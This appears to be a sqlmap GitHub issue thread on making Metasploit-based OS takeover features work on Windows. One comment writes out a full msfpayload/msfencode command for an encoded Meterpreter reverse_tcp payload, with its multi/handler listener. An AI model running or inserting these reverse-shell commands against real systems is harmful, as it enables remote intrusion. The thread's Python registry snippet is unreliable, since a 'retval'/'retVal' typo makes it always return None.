Out-of-band takeover features need to work also on Windows

[bdamele]

Now that Metasploit properly runs on Windows too (without cygwin), we definitely need to support all functionalities on Windows too, if possible. Hence, --os-pwn/--os-smbrelay/--os-smb code need to be reviewed: metasploit.py, subprocessng.py and icmpsh*.py.

[stamparm]

Sample run: C:\metasploit>scripts\setenv.bat C:\metasploit\msf3>ruby msfpayload

[stamparm]

Sample generic one-liner run:

<metasploit_install_dir>\scripts\setenv.bat & ruby <metasploit_install_dir>\msf3\msfpayload

[stamparm]

Installation directory registry location:

"HKEY_LOCAL_MACHINE"\"SOFTWARE\Rapid7\Metasploit"\"Location"

[stamparm]

import subprocess

IS_WIN = subprocess.mswindows

def _(key, value):
    retVal = None

    if IS_WIN:
        try:
            from  _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE
            _ = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
            _ = OpenKey(_, key)
            retval = QueryValueEx(_, value)[0]
        except:  # Pokemon Exception Handling
            pass

    return retVal

installDir = _(r"SOFTWARE\Rapid7\Metasploit", "Location")

[stamparm]

Just for further reference for commands/forms which need to be supported:

/usr/local/bin/msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=48426 LHOST=192.168.21.1 R | /usr/local/bin/msfencode -a x86 -e x86/alpha_mixed -o /home/stamparm/Dropbox/Work/sqlmap/output/192.168.21.129/tmpmcaro -t raw BufferRegister=EAX

/usr/local/bin/msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=48426 LHOST=192.168.21.1 E

[bdamele]

Consider to rewrite the Metasploit integration by interacting with the Metasploit RPC interface (msfrpcd) instead of wrapping the msfconsole/msfpayload/msfencode executables